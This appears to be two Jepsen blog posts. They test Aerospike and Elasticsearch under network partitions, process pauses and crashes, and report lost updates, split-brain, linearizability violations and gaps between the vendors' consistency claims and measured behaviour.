Previously, on Jepsen, we reviewed Elasticsearch’s progress in addressing data-loss bugs during network partitions. Today, we’ll see Aerospike, an “ACID database”, react violently to a basic partition.

Aerospike is a high-performance, distributed, schema-less, KV store, often deployed in caching, analytics, or ad tech environments. Its five-dimensional data model is similar to Bigtable or Cassandra: namespaces (databases) contain sets (tables) of records, where keys identify records. Each record is a map of bin names to values. Aerospike has put a good deal of work into performance across good-size (~100TB) datasets, and is repositioning itself as a general purpose datastore competitive with, say, MongoDB.

Data is sharded and balanced between servers using a Paxos-based membership algorithm. Stored procedures are available in Lua and allow for MapReduce-style parallel queries. There’s a lot to like here. However, Aerospike makes a dangerous assumption for a distributed datastore: it assumes the network is reliable. In this post, we’ll explore what happens in Aerospike 3.5.4 when the network is not reliable.

Availability

yes this is a real graphic a database vendor put on their homepage

Aerospike’s marketing copy delivers. The home page, for example, advertises “100% Uptime”. This makes Aerospike’s uptime infinitely better than the Ericsson AXD301 switch, which delivered somewhere between five and nine nines of availability in a system comprised of 1.1 million lines of Erlang. That this level of reliability can be obtained in a distributed database–notoriously fickle beasts–is nothing short of remarkable.

I would be delighted to use any software this dependable–but how does it work?

In the ACID architecture documentation they elaborate:

Aerospike is by and large an AP system that provides high consistency by using the following techniques:

Recall that an AP system provides total availability: every request to a non-crashed node must succeed, regardless of any disruption in the network between the nodes. How do they provide “high consistency”?

  • Trade off availability and consistency at a finer granularity in each subsystem

OK!

  • Restrict communication latencies between nodes to be sub-millisecond

Real network disruptions are usually finite in length: you should expect lots of short-term delays on the order of microseconds, a few on the order of minutes, and rarely, for hours or days. If your system’s characteristic latencies (e.g. timeouts) are on the order of minutes, disruption of a few seconds won’t affect logical correctness. If, however, you consider a node dead after a millisecond, that means leader elections–and the chance for multiple primaries to commit conflicting data–will occur more often. On the other hand, the window for data loss might be shorter because isolated primaries step down sooner. Tradeoffs.

  • Leverage the high vertical scale of Aerospike (1 million TPS and multiple terabyte capacity per node) to ensure that cluster sizes stay small (between 1 and 100 nodes)

Small cluster sizes do reduce the probability of seeing any partition, but in a sharded system like Aerospike, Riak, or Cassandra, the only network paths that matter are those between the n (usually 2 to 5) replicas of any given key. As the number of machines N grows, n remains constant: link failures for individual nodes affect less and less of the keyspace. What matters more is higher-order topology: top-of-rack and distribution switches–and those should usually sit between replicas in your cluster anyway to maximize availability.

In a cloud environment, most bets are off.

  • Virtually eliminate partition formation as proven by years of deployments in data center and cloud environments

As software engineers, the network is the Symplegades to our Argo, the Velociraptors in our Jurassic Park, the Aristotle Benson to our Jamie. The network decides what it’s going to allow and we’ve got to work within those bounds.

  • Ensure extremely high consistency and availability during node failures and rolling upgrades (in the absence of partitions that are rare anyway)

“Provides high consistency by … ensur[ing] extremely high consistency.”

  • Provide automatic conflict resolution to ensure newer data overrides older data during cluster formation

Fair enough. Every AP system is going to have some sort of conflict management strategy.

So, what does “high consistency” mean, exactly?

Consistency

Map of consistency models and their availability.

On the home page and throughout their white papers, Aerospike claims to offer “ACID consistency”. ANSI SQL 92 defines (sort of; you can interpret their English definitions in either “anomalous” or “strict” terms) four levels for transaction isolation, which place increasingly stronger invariants around the interleaving of operations from different transactions in terms of four disallowed phenomena:

  • Read Uncommitted (prohibits P0: dirty writes)
  • Read Committed (prohibits P0 & P1: dirty reads)
  • Repeatable Read (prohibits P0, P1 & P2: fuzzy reads)
  • Serializable (prohibits P0, P1, P2, & P3: phantom reads)

… and there are also MVCC isolation models, Snapshot Isolation, Monotonic Atomic View, and so on, each with varying guarantees and different levels of availability. In the map to the right, the right hand branch shows various ACID isolation models. Purple denotes sticky-available ones, and red shows models that must sacrifice availability during a partition.

Which of these isolation levels does Aerospike support? The ACID whitepaper elaborates:

Aerospike provides read-committed isolation level using record locks to ensure isolation between multiple transactions.

Read-committed is achievable in a totally available (AP) system! It falls within the green region. So far, everything’s consistent. But the white paper goes on:

For operations on single keys with replication and secondary indexes, Aerospike provides immediate consistency using synchronous writes to replicas within the cluster, i.e., the client will be intimated about the successful write only if the replica is also updated.

And then,

After a write is completely applied and the client is notified of success, all subsequent read requests are guaranteed to find the newly written data: there is no possibility of reading stale data. Therefore, Aerospike transactions provide immediate consistency.

This suggests reads must linearize with respect to writes–and we know from the CAP theorem that linearizable systems cannot be totally available. This system must sacrifice either availability or consistency when a partition occurs. But which?

AP vs CP mode

The whitepaper helpfully includes a discussion of this tradeoff in its final section: Deployment modes – AP vs CP. The section on “CP mode” is mostly speculation, mainly because CP mode doesn’t exist.

The AP mode that Aerospike supports today prioritizes availability and therefore can be consistent only when partitions do not occur. In the future, Aerospike will add support for CP mode as an additional deployment option.

They go on to warn:

A key design point of Aerospike is to setup cluster nodes that are tightly coupled so that partitions are virtually impossible to create.

OK. So what magical network does Aerospike recommend we deploy on? The deploy page leads with Google Compute Engine and Amazon EC2, both of which have notoriously flaky networks.

Deploy to Google Compute Engine or EC2

How do you get sub-millisecond latency bounds out of EC2’s network? The Amazon Deployment Guide “recommend[s] the use of placement groups for Aerospike server instances,” e.g., you should put all your nodes in the same Availability Zone. Availability zones tend to fail dramatically every year or so, which raises the question of how we’re going to achieve that 100% uptime promised on the Aerospike home page.

To add further redundancy to Aerospike in AWS using Availability Zone (AZ), you can set up two cluster across two different availability zones such that there is one set of data in each AZ.

If you wish to configure an Aerospike cluster across two zones or regions, we suggest you use an Application-level Queue like Kafka or RabbitMQ.

Aerospike Enterprise Edition has Cross Data Center Replication (XDR) feature, which handles clusters located in multiple data centers. Please contact us for further details.

This is starting to sound less like “100% uptime with ACID consistency” than I’d hoped. Let’s put it to the test.

Linearizable CAS registers

To establish whether operations are linearizable, we’ll use a single bin in a single key as a register, and use Aerospike’s conditional writes to implement a compare-and-set register on top of that record. Our Jepsen client will handle reads, cas, and write ops by fetching the current value, performing a read+conditional-write, and an unconstrained write, respectively.

Then we’ll feed a mixture of randomly selected read, write, and CaS ops to that client, while interrupting the network in a 10-seconds-on, 10-seconds-off schedule, and analyze the results with Knossos to see whether they’re consistent with a linearizable history. When a client thinks a value has successfully been written, is it actually visible to others?

Inconsistent state transitions: ([{:value 4} "can't CAS 4 from 0 to 3"])
Diagram of a linearizability violation

The answer is no.

Jepsen routinely detects linearizability violations in a matter of seconds, on both read and CaS operations. For instance, this analysis follows a history where the only possible state for the register was 4, but an Aerospike client was able to execute a compare-and-set of 0 to 3. This implies both reads and conditional writes are unsafe, since the Jepsen client validates that the read value was 0 before issuing a conditional write.

In this timeline, process 6 and process 7 have pending writes of the values 2 and 4 respectively, which timed out due to a network partition. Process 11 writes 0, and that write is visible to process 12, which reads 0. Then process 4 reads 2, which means process 6’s write must have gone through.

Next, process 10 writes 4 successfully–and process 12 executes a compare-and-set from 0 to 3. This should be impossible–process 12 should have seen the most recent write of 4, not 0!

Could the value have been changed by another crashed write? No–the only other concurrent write was process 7’s write of 4, which would leave the value unchanged. This history is not consistent with a linearizable register.

We don’t even have to wait 10 seconds between network transitions. Even disruptions which resolve within a second or two is enough to induce data loss and unavailability. I expect that even millisecond-scale network disruptions should be sufficient, but Jepsen can’t control the network on that fine a timescale yet. This graph shows partitions as grey regions, and point type indicates what the Aerospike client thought happened: successful ops as +, known failed operations as x, and indeterminate ops as *.

100% available

We’re setting a timeout of 500ms here, and operations still time out every time a partition between nodes occurs. In these tests we aren’t interfering with client-server traffic at all.

Aerospike may claim “100% uptime”, but this is only meaningful with respect to particular latency bounds. Given Aerospike claims millisecond-scale latencies, you may want to reconsider whether you consider this “uptime”.

Counters

Linearizability is a relatively strict constraint, though. Aerospike is often deployed as an analytics datastore for high-volume things like counters. Counter increments are commutative, which make them excellent candidates for conflict resolution! Aerospike may not be able to offer linearizability, but it might offer eventually consistent counters.

We’ll use the built-in add method from the Aerospike Java client to build a client that accepts add ops to increment a counter, and read ops to fetch the current value.

We know the true value of a counter should be at most the number of attempted increments, and at least the number of acknowledged increments. This analyzer verifies that any read operations overlap with a counter value in that range–and can tell us how far out of bounds each read falls.

The value of the counter falls further and further below the minimum bound with each network disruption

The (awful, I know) graph to the right shows the counter value from a typical run, plotted over something roughly analogous to time. The observed value, in orange, should lie within the blue and yellow bounds given by the number of successful and acknowledged increments. However, as the network shifts, the counter drifts lower and lower. By the time of the final read, about 10% of the increment operations have been lost.

There’s an interesting anomaly in the middle of this graph–for a time, the observed value fluctuates between two clusters of incrementing values. This is a visible consequence of split-brain: two primary nodes both believe they are authoritative, and are processing updates and reads for significantly different values of the counter.

Just like the CaS register test, increment and read latencies will jump from ~1 millisecond to ~500 milliseconds when a partition occurs. Timeouts are not availability.

Still not 100% available

However, we may be willing to tolerate higher latencies!

If we raise the timeouts arbitrarily high (and increase the length of partitions to 10 seconds to ensure operations can’t just block for the duration of the partition itself) Aerospike can service every request successfully, peaking at ~2 seconds. Note that fewer requests time out because Jepsen uses a fixed-concurrency test–slower response times mean fewer requests in any given interval.

Unbounded timeouts

I’d consider these very good figures for latency overall; many systems have characteristic recovery times on the order of 60 seconds, not 2 seconds! I think Aerospike deserves a round of applause here.

Conflict resolution

A CRDT like a PN-counter wouldn’t show this type of behavior. Although read values would drop below bounds temporarily (in the scope of a partition), when the partition resolved, the PN-counter’s merge function would recombine the increments from both sides and we’d read a value within bounds.

Aerospike’s counter behavior is characteristically different: it may be eventually consistent in that clients agree on a value, but it’s not the value we want. The damage is done, so to speak. Why?

At a later point, if the factions rejoin, data that has been written in both factions will be detected as inconsistent. Two policies may be followed. Either Aerospike will auto-merge the two data items (default behavior today) or keep both copies for application to merge later (future). Auto merge works as follows:

  • TTL (time-to-live) based: The record with the highest TTL wins
  • Generation based: The record with the highest generation win

Using the generation number preserves the record that has gone through the most changes since divergence. In the diagram below, a register containing a, with generation 0, is split by a network partition. The lower replica accepts two writes of b and c, respectively, making its generation 2. The upper replica then accepts a single write of d, and has generation 1. Since the lower replica containing c underwent more changes, it wins, clobbering the subsequent write of d.

Generation vs TTL conflict resolution

In TTL-based conflict resolution, the version with the higher Time To Live wins. It’s not clear to me whether Aerospike uses the size of the TTL or the time the record is supposed to expire, but both are inconsistent. An earlier write can clobber a later one if its TTL happens to be higher, or if its local clock is misaligned, etc. If the values are equal, the best option is for Aerospike to fall back to generation-based conflict resolution. If the generations are equal? It’s a coin flip.

There’s no way for these strategies to not lose updates. I asked Aerospike’s support about the data-loss issues I saw in my tests, and they recommended using the generation policy for counters and TTL resolution for “idempotent changes”. In my tests, both conflict resolution strategies resulted in identical data-loss patterns.

LOST UPDATES
Nope nope nope nope

Lost updates (and related anomalies in Aerospike) invalidate its claims to every ACID isolation level. We’re not just talking about the temporary visibility of garbage data–we’re talking about accepting updates that never should have happened in the first place, like claiming a unique ID twice, or double-withdrawing a balance.

So long as Aerospike automatically merges data in this way, we can’t avoid write loss. But we can take advantage of a feature called “application merge”, which, like Riak or CouchDB, presents divergent versions of a record to the client for conflict resolution. From the ACID whitepaper:

Application merge works as follows:

  • When two versions of the same data item are available in the cluster, a read of this value will return both versions, allowing the application to resolve the inconsistency.
  • The client application – the only entity with knowledge of how to resolve these differences – must then re-write the data in a consistent fashion.
Sister Monoid, of the Sisters of Partitional Indulgence

If our merge function is associative and commutative, we obtain a structure called a commutative monoid, which frees us from having to care about which side performed updates in which order. We can simply mash all the updates together any which way and get the same result. However, this isn’t enough! We don’t have just a list of updates–we only have the merged result of two possibly intersecting sets of updates on two different replicas. A normal merge would double-count operations common to both histories.

We have to add a third property: idempotence. merge(merge(x, y), y) should be the same as merge(x, y). If our merge function is associative, commutative, and idempotent, we obtain what’s called a CRDT, or Commutative Replicated Datatype. CRDTs ensure that reads eventually converge on a least upper bound for all past operations. No updates lost, nothing double-counted. We still have the possibility of stale reads, but they’ll eventually converge on the right value.

So, let’s test it! We’ll just google for “aerospike application merge” to figure out where this feature lives, and find this question on the Aerospike forums:

“Wanted to know if Application based merge still works?”

Currently, TTL and generation are still the only 2 options available for handling conflict.

Like CP mode, this important safety feature does not actually exist.

Recommendations

Aerospike offers phenomenal latencies and throughput–but in terms of data safety, its strongest guarantees are similar to Cassandra or Riak in Last-Write-Wins mode. It may be a safe store for immutable data, but updates to a record can be silently discarded in the event of network disruption. Because Aerospike’s timeouts are so aggressive–on the order of milliseconds–even small network hiccups are sufficient to trigger data loss.

If you are an Aerospike user, you should not expect “immediate”, “read-committed”, or “ACID consistency”; their marketing material quietly assumes you have a magical network, and I assure you this is not the case. It’s certainly not true in cloud environments, and even well-managed physical datacenters can experience horrible network failures.

Aerospike delivers millisecond-scale latencies when healthy, but even small network hiccups can cause timeouts. This is not particularly surprising–most AP systems go briefly unavailable (or equivalently, have much higher latencies) while converging on a new state when the network changes, but you should keep it in mind: “100% uptime” probably won’t hold through network failure if you demand responses within 50 or even 500 ms. If you’re willing to wait a few seconds for requests, though, Aerospike appears to satisfy.

To be read in the voice of Ruby Rhod

Aerospike uses a Paxos implementation as a part of their membership algorithm, so they’re clearly no strangers to consensus systems. I asked whether they planned to address these problems by threading writes through their Paxos implementation, and they responded that this would impose unacceptable overhead for their latency-sensitive customers.

Aerospike synchronously replicates to all replicas by default, and fast generalized Paxos only requires acknowledgement from a majority, so on paper using Paxos would actually improve performance–but the extra state machinery required might outweigh the network latency costs. Or their particular Paxos implementation may require more rounds. That’s a balance they’ll have to explore!

Keep in mind that even if Aerospike doesn’t use Paxos for their writes, write loss may be tolerable! Many ad tech systems process millions of requests per second, and losing data for a tenth of those over a few minutes might mean nothing to their bottom line. What does cost money is serving ads slower than one’s competitors–so a system like Aerospike could be a perfect fit. The same goes for many analytics stores–so long as the cluster is healthy more often than not, lost increments can wash out in the noise. Most caches tolerate lost updates just fine.

Bottom line: consider Aerospike as a high-volume, lossy key-value store, not as a source of record for high-value mutable data.

Stripe

This work is a part of my research at Stripe, and I would like to thank everyone there–especially Marc Hedlund–for helping me test distributed systems and publish articles like this. I’d like to thank Lucien Volmar, Kevin Porter, and Peter Corless from Aerospike for their help in getting the cluster set up and evaluating test results. Finally, my thanks to Caitie McCaffrey, Duretti Hirpa, Coda Hale, and Inés Sombra for their very helpful comments.

Previously, on Jepsen, we demonstrated stale and dirty reads in MongoDB. In this post, we return to Elasticsearch, which loses data when the network fails, nodes pause, or processes crash.

Nine months ago, in June 2014, we saw Elasticsearch lose both updates and inserted documents during transitive, nontransitive, and even single-node network partitions. Since then, folks continue to refer to the post, often asking whether the problems it discussed are still issues in Elasticsearch. The response from Elastic employees is often something like this:

"Not a major problem"

In this Jepsen post, I’d like to follow up on Elastic’s reaction to the the first post, how they’ve addressed the bugs we discussed, and what data-loss scenarios remain. Most of these behaviors are now documented, so this is mainly a courtesy for users who requested a followup post. Cheers!

Reactions

The initial response from Elasticsearch was somewhat muted. Elasticsearch’s documentation remained essentially unchanged for months, and like Datastax with the Cassandra post, the company made no mention of the new findings in their mailing list or blog.

However, Elastic continued to make progress internally. Around September they released a terrific page detailing all known data-loss and consistency problems in Elasticsearch, with links to relevant tickets, simple explanations of the cause for each bug, and descriptions of the possible consequences. This documentation is exactly the kind of resource you need when evaluating a new datastore, and I’d like to encourage every database vendor to publish a similar overview. I would like to see Elasticsearch reference known failure modes in the documentation for particular features–for instance, Optimistic Concurrency Control could mention that version checks are not guaranteed to actually work: your update could be lost or misapplied–but the addition of a failure-modes page is a dramatic improvement and deserves congratulation!

Moreover, the resiliency page provides official confirmation that Elastic is using Jepsen internally to replicate this work and help improve their safety guarantees, in addition to expanding their integrated tests for failure scenarios.

Elastic has previously expressed that they’d prefer to design their own consensus system (ZenDisco) instead of re-using an existing one. All the issues we discussed in the last Elasticsearch post essentially stem from that decision–and I was hoping that they might choose to abandon ZenDisco in favor of a proven algorithm. That hasn’t happened yet, but Elastic did land a massive series of patches and improvements to ZenDisco, and closed the intersecting-partitions split-brain ticket on September first, 2014. The fixes appeared definitive:

It's fixed now.

And as folks referenced the previous Jepsen post on Twitter, I noticed a common response from Elasticsearch users: because the ticket is closed, we can safely assume that Elasticsearch no longer loses data in network partitions. Elasticsearch’s resiliency page is very clear that this is not the case: ES currently fails their Jepsen tests and is still known to lose documents during a network partition.

So, is the intersecting-network-partitions-causing-split-brain bug fixed? Or are these problems still extant, and if so, how bad are they? I’ve updated the Jepsen tests for Elasticsearch to test the same scenarios on version 1.5.0.

Intersecting partitions

In this test, we insert a stream of documents, each containing a distinct integer, into a five-node Elasticsearch cluster. Meanwhile, we cut the network in half, but leave one node visible to both components. I’ve called this a “bridge”, or “nontransitive” partition, and the ticket refers to it as “partial” or “intersecting”–same topology in all cases. In version 1.1.0, this test caused Elasticsearch to elect a stable primary node on both sides of the partition (with the node in the middle considering itself a part of both clusters) for the entire duration of the partition. When the network healed, one primary would overwrite the other, losing about half of the documents written during the partition.

With the improvements to ZenDisco, the window for split-brain is significantly shorter. After about 90 seconds, Elasticsearch correctly elects a single primary, instead of letting two run concurrently. The new tests only show the loss of a few acknowledged documents, usually in a window of a few seconds around the start of a partition. In this case, 20 documents were successfully inserted, then discarded by Elasticsearch.

{:valid? false, :lost "#{795 801 809 813..815 822..827 830 832..833 837 839..840 843..846}", :recovered "#{46 49..50 251 255 271..272 289 292 308..309 329 345 362 365 382..383 435 445 447..448 453..455 459 464 478..479 493 499 517 519 526 529 540 546..547 582 586 590 605 610 618 621 623 626 628 631 636 641 643 646 651 653 656 658 661 663 668 671 673 676 678 681 683 686 691 693 696 698 703 708 710 714..715 718 720 729 748 753}", :ok "#{0..46 49..51 54..67 70..85 88..104 106 108..123 126..141 143 145..159 161..162 164..178 180 182..196 199..214 216..217 219..233 236..325 327..345 347..420 422 424..435 437 441..442 445 447..448 450 452..455 459 461 463..471 473 476..480 483..494 498..502 506..510 512 516..520 523 526 529..530 532 536..542 545..549 552..560 566 568..570 572 575..576 578..579 582..586 590..595 600 604..605 610 612 618 621 623 626 628 631 636 641 643 646 651 653 656 658 661 663 668 671 673 676 678 681 683 686 691 693 696 698 703 708 710 714..715 718 720 729 748 753}", :recovered-frac 80/897, :unexpected-frac 0, :unexpected "#{}", :lost-frac 22/897, :ok-frac 553/897}

The root ticket here is probably 7572: A network partition can cause in flight documents to be lost, which was opened only a couple days after Mr. Leskes closed the intersecting-partitions ticket as solved. The window for split-brain is significantly shorter with the new patches, but the behavior of losing documents during this type of partition still exists despite the ticket being closed.

Expect delays

I touched on this in the previous post, but I’d like to restate: electing a new primary in Elasticsearch continues to be an expensive process. Because of that 90-second hardcoded timeout, no matter how low you set the failure detection timeouts and broadcast intervals, Elasticsearch will go globally unavailable for writes for a minute and a half when a network partition isolates a primary.

Latency graph

Shaded regions indicate when a network partition has isolated a primary node. + indicates a successful insert, and * shows a crashed update which may or may not have succeeded. Jepsen imposes a hard five-second timeout on all inserts, which forms the upper bound to the graph. Note that every operation times out for 90 seconds after a partition begins.

Because each of the five clients in this test are talking to a distinct node in the cluster, we can see partial availability in the steady state–clients talking to the isolated primary continue to time out, and clients talking to the majority component resume operations once that component elects a new primary.

Isolated primaries

One of the new bugs I discovered in Elasticsearch during the last round of Jepsen was that not only would it lose data during transitive partitions, but even partitions which cut the network into two completely connected isolated components–or even just isolating a single node–would induce the loss of dozens of documents.

That bug is unaffected by the changes to Zendisco in 1.5.0. In this particular run, isolating only primary nodes from the rest of the cluster could cause almost a quarter of acknowledged documents to be lost.

{:valid? false, :lost "#{471..473 546..548 551..565 567..568 570..584 586 588..602 604 606..621 623 625..639 641..642 644..658 660 662..676 678 680..694 696 698..712 714..715 717..731 733 735..750 752 754..768 770 772..777}", :recovered "#{49..50 58 79..82 84..87 89..92 94..97 99..102 104..107 109..112 114..123 128 149 170 195 217 241 264 298 332..333 335 337..338 340 342..345 347..350 352..353 355..356 358..361 363..366 368..371 373..375 378..381 383..386 388..391 810 812 817 820 825 830 834..835 837 839..840 842 844..845 847 849..850 852 854..855 857 859..860 862 864..867 869..872 874..877 879 881 913 932}", :ok "#{0..53 58 79..82 84..87 89..92 94..97 99..102 104..107 109..112 114..299 301 332..333 335 337..338 340 342..345 347..350 352..353 355..356 358..361 363..366 368..371 373..376 378..381 383..386 388..391 393..405 407..428 430..450 452..470 810 812 817 820 825 830 834..835 837 839..840 842 844..845 847 849..850 852 854..855 857 859..860 862 864..867 869..872 874..877 879..882 884..895 897..902 904..919 921..939 941..946}", :recovered-frac 134/947, :unexpected-frac 0, :unexpected "#{}", :lost-frac 209/947, :ok-frac 490/947}

This is not a transient blip for in-flight docs–the window of data loss extends for about 90 seconds, which is, coincidentally, one of the hard-coded timeouts in electing a new primary.

I’ve opened 10406 for this problem, because it’s also a split-brain issue. For several seconds, Elasticsearch is happy to believe two nodes in the same cluster are both primaries, will accept writes on both of those nodes, and later discard the writes to one side.

Sometimes the cluster never recovers from this type of partition, and hangs until you do a rolling restart. Wooooooo!

GC pauses

One of the things Elasticsearch users complain about is garbage collection-induced split-brain. This isn’t documented as something that can cause data loss on the resiliency page, so I’ve written a test which uses SIGSTOP and SIGCONT to pause a random primary process, simulating a long garbage-collection cycle, swap pressure, or an IO scheduler hiccup.

This causes Elasticsearch to lose data as well. Since the paused node isn’t executing any requests while it’s stuck, it doesn’t have the opportunity to diverge significantly from its peers–but when it wakes up, it’s happy to process an in-flight write as if it were still the legal primary, not realizing that it’s been superceded by an election while it was asleep. That can cause the loss of a few in-flight documents.

Repeated pauses, like you might see in a swapping system, a node under severe memory pressure, or one with a faulty disk, can result in more catastrophic data loss–in this case, ~9.3% of 2143 acknowledged documents were actually lost.

{:valid? false, :lost "#{1794 1803..1806 1808..1809 1811..1812 1817 1819..1820 1823 1828 1830 1832..1835 1837..1838 1841..1845 1847 1849 1851 1854..1856 1859 1861..1863 1865..1868 1871 1873 1875 1877 1879 1881..1882 1886..1889 1891 1894..1897 1900..1902 1904..1907 1909 1911..1912 1917..1919 1925 1927..1928 1931..1936 1938 1941..1943 1945 1947..1951 1953..1954 1956..1957 1959..1962 1964..1966 1970..1971 1973..1974 1977..1978 1980 1982 1986..1987 1989..1990 1992..1994 1998..1999 2001 2003 2007..2008 2010 2012 2014..2021 2023..2025 2031..2034 2039 2044 2046..2048 2050 2053..2057 2060..2062 2064..2068 2073..2075 2077..2078 2081..2082 2084..2087 2089..2090 2092 2094 2097..2098 2100 2102..2103 2107 2110 2112..2114 2116..2123 2127 2130..2134 2136 2138..2139 2141..2142}", :recovered "#{0 9 26 51 72 96 118 141 163 187 208 233 254 278 300 323 346 370 393 435 460 481 505 527 552 573 598 621 644 668 691 715 737 761 783 806 829 851 891 906 928 952 977 998 1022 1044 1069 1090 1113 1136 1159 1182 1204 1228 1251 1275 1298 1342..1344 1348 1371 1416 1438 1460 1484 1553 1576 1598 1622 1668 1692 1714 1736 1783..1784 1786..1787 1790..1792 1795..1797 1807 1852 1876 1898 1922 1967 1991 2105}", :ok "#{0..1391 1393..1506 1508..1529 1531..1644 1646..1779 1783..1784 1786..1788 1790..1793 1795..1802 1807 1810 1813..1816 1818 1821..1822 1824..1827 1831 1836 1839..1840 1846 1848 1850 1852..1853 1857..1858 1860 1864 1869..1870 1872 1874 1876 1878 1880 1883..1885 1890 1892..1893 1898..1899 1903 1908 1910 1913..1916 1920..1924 1926 1929..1930 1937 1939..1940 1944 1952 1955 1958 1963 1967..1969 1972 1975..1976 1979 1981 1983..1985 1988 1991 1995..1997 2000 2002 2004..2006 2009 2011 2022 2026..2030 2035..2036 2038 2040..2043 2045 2049 2051..2052 2058 2063 2069..2072 2076 2079..2080 2088 2091 2093 2095..2096 2099 2101 2104..2106 2108..2109 2111 2115 2124..2126 2128 2135 2137 2140}", :recovered-frac 92/2143, :unexpected-frac 0, :unexpected "#{}", :lost-frac 200/2143, :ok-frac 1927/2143}

These sorts of issues are endemic to systems like ZenDisco which use failure detectors to pick authoritative primaries without threading the writes themselves through a consensus algorithm. The two must be designed in tandem.

Elastic is taking the first steps towards a consensus algorithm by introducing sequence numbers on writes. Like Viewstamped Replication and Raft, operations will be identified by a monotonic [term, counter] tuple. Coupling those sequence numbers to the election and replication algorithms is tricky to do correctly, but Raft and VR lay out a roadmap for Elasticsearch to follow, and I’m optimistic they’ll improve with each release.

I’ve opened a ticket for pause-related data loss, mostly as a paper trail–Elastic’s engineers and I both suspect 7572, related to the lack of a consensus algorithm for writes, covers this as well. Initially Elastic thought this might be due to a race condition in index creation, so Lee Hinman (Dakrone) helped improve the test so it verified the index status before starting. That index-creation problem can also cause data loss, but it’s not the sole factor in this Jepsen test–even with these changes, Elasticsearch still loses documents when nodes pause.

{:valid? false, :lost "#{1761}", :recovered "#{0 2..3 8 30 51 73 97 119 141 165 187 211 233 257 279 302 324 348 371 394 436 457 482 504 527 550 572 597 619 642 664 688 711 734 758 781 804 827 850 894 911 934 957 979 1003 1025 1049 1071 1092 1117 1138 1163 1185 1208 1230 1253 1277 1299 1342 1344 1350 1372 1415 1439 1462 1485 1508 1553 1576 1599 1623 1645 1667 1690 1714 1736 1779 1803 1825 1848 1871 1893 1917 1939 1964 1985 2010 2031 2054 2077 2100 2123 2146 2169 2192}", :ok "#{0..1344 1346..1392 1394..1530 1532..1760 1762..2203}", :recovered-frac 24/551, :unexpected-frac 0, :unexpected "#{}", :lost-frac 1/2204, :ok-frac 550/551}

Crashed nodes

You might assume, based on the Elasticsearch product overview, that Elasticsearch writes to the transaction log before confirming a write.

Elasticsearch puts your data safety first. Document changes are recorded in transaction logs on multiple nodes in the cluster to minimize the chance of any data loss.

I’d like to draw your attention to a corner of the Elasticsearch documentation you may not have noticed: the translog config settings, which notes:

index.gateway.local.sync

How often the translog is fsynced to disk. Defaults to 5s.

To be precise, Elasticsearch’s transaction log does not put your data safety first. It puts it anywhere from zero to five seconds later.

In this test we kill random Elasticsearch processes with kill -9 and restart them. In a datastore like Zookeeper, Postgres, BerkeleyDB, SQLite, or MySQL, this is safe: transactions are written to the transaction log and fsynced before acknowledgement. In Mongo, the fsync flags ensure this property as well. In Elasticsearch, write acknowledgement takes place before the transaction is flushed to disk, which means you can lose up to five seconds of writes by default. In this particular run, ES lost about 10% of acknowledged writes.

{:valid? false, :lost "#{0..49 301..302 307 309 319..322 325 327 334 341 351 370 372 381 405 407 414 416 436 438 447 460..462 475 494 497 499 505 .......... 10339..10343 10345..10347 10351..10359 10361 10363..10365 10367 10370 10374 10377 10379 10381..10385 10387..10391 10394..10395 10397..10405 10642 10649 10653 10661 10664 10668..10669 10671 10674..10676 10681 10685 10687 10700..10718}", :recovered "#{2129 2333 2388 2390 2392..2395 2563 2643 2677 2680 2682..2683 4470 4472 4616 4635 4675..4682 4766 4864 4967 5024..5026 5038 5042..5045 5554 5556..5557 5696..5697 5749..5757 5850 5956 6063 6115..6116 6146 6148..6149 6151 6437 6541 6553..6554 6559 6561 11037 11136 11241 11291..11295}", :ok "#{289..300 303..306 308 310..318 323..324 326 328..333 335..338 340 343..346 348..350 352 354..359 361..363 365..368 371 ........ 10648 10650..10652 10654..10660 10662..10663 10665..10667 10670 10672..10673 10677..10680 10682..10684 10686 10688..10699 10964 10966..10967 10969 10972..11035 11037 11136 11241 11291..11299}", :recovered-frac 37/5650, :unexpected-frac 0, :unexpected "#{}", :lost-frac 23/226, :ok-frac 1463/2825}

Remember that fsync is necessary but not sufficient for durability: you must also get the filesystem, disk controller, and disks themselves to correctly flush their various caches when requested.

I don’t believe this risk is anywhere near as serious as the replication problems we’ve discussed so far. Elasticsearch replicates data to multiple nodes; my tests suggest it requires coordinated crashes of multiple processes to induce data loss. You might see this if a DC or rack loses power, if you colocate VMs, if your hosting provider restarts a bunch of nodes, etc, but those are not, in my experience, as common as network partitions.

However, it is a fault worth considering, and Zookeeper and other consensus systems do fsync on a majority of nodes before considering a write durable. On the other hand, systems like Riak, Cassandra, and Elasticsearch have chosen not to fsync before acknowledgement. Why? I suspect this has to do with sharding.

Fsync in Postgres is efficient because it can batch multiple operations into a single sync. If you do 200 writes every millisecond, and fsync once per millisecond, all 200 unflushed writes are contiguous in a single file in the write-ahead log.

In Riak, a single node may run dozens of virtual nodes, and each one has a distinct disk store and corresponding WAL. Elasticsearch does something similar: it may have n Lucene instances on a given node, and a separate translog file for each one. If you do 200 writes per millisecond against a Riak or Elasticsearch node, they’ll likely end up spread across all n logs, and each must be separately fsynced. This reduces locality advantages, forcing the disk and caches to jump back and forth between random blocks–which inflates fsync latencies.

Anyway, depending on how durable Elasticsearch aims to be, they may wind up implementing a unified translog and blocking acknowledgements until writes may have been flushed to disk. Or they may decide that this is the intended balance and keep things where they are–after all, replication mitigates the risk of loss here. Since crash-restart durable storage is a prerequisite for most consensus algorithms, I have a hunch we’ll see stronger guarantees as Elasticsearch moves towards consensus on writes.

Recap

Elasticsearch 1.5.0 still loses data in every scenario tested in the last Jepsen post, and in some scenarios I wasn’t able to test before. You can lose documents if:

  • The network partitions into two intersecting components
  • Or into two discrete components
  • Or if even a single primary is isolated
  • If a primary pauses (e.g. due to disk IO or garbage collection)
  • If multiple nodes crash around the same time

However, the window of split-brain has been reduced; most notably, Elasticsearch will no longer maintain dual primaries for the full duration of an intersecting partition.

My recommendations for Elasticsearch users are unchanged: store your data in a database with better safety guarantees, and continuously upsert every document from that database into Elasticsearch. If your search engine is missing a few documents for a day, it’s not a big deal; they’ll be reinserted on the next run and appear in subsequent searches. Not using Elasticsearch as a system of record also insulates you from having to worry about ES downtime during elections.

Finally, Elastic has gone from having essentially no failure-mode documentation to a delightfully detailed picture of the database’s current and past misbehaviors. This is wonderful information for users and I’d love to see this from other vendors.

Up next: Aerospike.

Stripe

